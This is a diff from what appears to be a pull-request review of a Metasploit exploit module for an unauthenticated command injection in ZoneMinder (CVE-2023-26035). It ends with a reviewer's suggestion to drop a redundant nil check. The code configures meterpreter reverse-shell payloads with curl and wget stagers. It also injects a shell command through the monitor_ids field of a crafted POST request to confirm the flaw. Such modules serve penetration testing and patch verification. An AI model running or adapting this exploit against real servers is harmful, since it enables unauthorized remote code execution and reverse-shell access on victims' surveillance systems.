modules/exploits/unix/webapp/zoneminder_snapshots.rb

```diff
@@ -0,0 +1,164 @@
+        'Description' => %q{
+          This module exploits an unauthenticated command injection
+          in zoneminder that can be exploited by appending a command
+          to the "create monitor ids[]"-action of the snapshot view.
+          Affected versions: < 1.36.33, < 1.37.33
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'UnblvR',    # Discovery
+          'whotwagner' # Metasploit Module
+        ],
+        'References' => [
+          [ 'CVE', '2023-26035' ],
+          [ 'URL', 'https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr']
+        ],
+        'Privileged' => false,
+        'Platform' => ['linux', 'unix'],
+        'Targets' => [
+          [
+            'nix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+                'FETCH_WRITABLE_DIR' => '/tmp'
+              }
+            }
+          ],
+          [
+            'Linux (Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ],
+        ],
+        'CmdStagerFlavor' => [ 'bourne', 'curl', 'wget', 'printf', 'echo' ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-02-24',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET'
+    )
+    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
+    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
+
+    unless res.body.include?('ZoneMinder')
+      return Exploit::CheckCode::Safe('Target is not a ZoneMinder web server')
+    end
+
+    csrf_magic = get_csrf_magic(res)
+    # This check executes a sleep-command and checks the response-time
+    sleep_time = rand(5..10)
+    data = "view=snapshot&action=create&monitor_ids[0][Id]=0;sleep #{sleep_time}"
+    data += "&__csrf_magic=#{csrf_magic}" if csrf_magic
+    res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST',
+        'data' => data.to_s,
+        'keep_cookies' => true
+      )
+    end
+    print_status("Elapsed time: #{elapsed_time} seconds.")
+    if res && sleep_time < elapsed_time
```

Comment:
And then we can remove this because we check above to ensure `res` is non-nil
```suggestion
    if sleep_time < elapsed_time
```